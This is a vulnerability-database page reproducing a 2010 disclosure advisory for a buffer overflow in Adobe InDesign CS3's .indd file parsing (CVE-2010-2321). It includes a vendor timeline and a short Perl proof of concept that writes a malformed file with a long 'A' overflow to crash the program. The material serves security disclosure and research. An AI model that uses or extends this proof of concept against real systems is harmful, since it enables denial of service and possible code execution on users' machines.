Vulners
Lucene search
Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
🗓️ 04 Jun 2010 00:00:00Reported by Gjoko KrsticHigh five to Wendy and DavidType 
zeroscience🔗 www.zeroscience.mk👁 31 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2010-2321 | 11 Jun 201000:00 | – | circl |
 | CVE-2010-2321 | 18 Jun 201016:00 | – | cve |
 | CVE-2010-2321 | 18 Jun 201016:00 | – | cvelist |
 | CVE-2010-2321 | 18 Jun 201016:30 | – | nvd |
 | Adobe InDesign 'INDD' File Handling Remote Buffer Overflow Vulnerability | 25 Jun 201000:00 | – | openvas |
| Adobe InDesign 'INDD' File Handling Remote Buffer Overflow Vulnerability | 25 Jun 201000:00 | – | openvas |
 | Buffer overflow | 18 Jun 201016:30 | – | prion |
<html><body><p>#!/usr/bin/perl
#
# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
#
# Vendor: Adobe Systems Inc.
#
# Product Web Page: http://www.adobe.com
#
# Version tested: CS3 10.0
#
# Summary: Adobe� InDesign� CS3 software provides precise control over
# typography and built-in creative tools for designing, preflighting,
# and publishing documents for print, online, or to mobile devices. Include
# interactivity, animation, video, and sound in page layouts to fully engage
# readers.
#
# Desc: When parsing .indd files to the application, it crashes instantly
# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and
# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution
# and denial of service.
#
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# 16.09.2009
#
#
#
# Vendor status:
#
# [16.09.2009] Vulnerability discovered.
# [09.03.2010] Vulnerability reported to vendor with sent PoC files.
# [21.03.2010] Asked confirmation from the vendor.
# [21.03.2010] Vendor asked for PoC files due to communication errors.
# [22.03.2010] Re-sent PoC files to vendor.
# [04.04.2010] Vendor confirms vulnerability.
# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
# [04.06.2010] Public advisory released.
#
#
# Zero Science Lab Advisory ID: ZSL-2010-4941
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php
#
#
#
# Raw PoC code:
#
$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01";
$fn = "teppei.indd";
$bof = "\x41" x 10000;
print "\n\n[*] Creating PoC file: $fn ...\r\n";
sleep(1);
open(indd, ">./$fn") || die "\n\aCannot open $fn : $!";
print indd "$header" . "$bof";
close (indd);
print "\n[*] PoC file successfully created!\r\n";</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2010 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 29.3
EPSS0.33852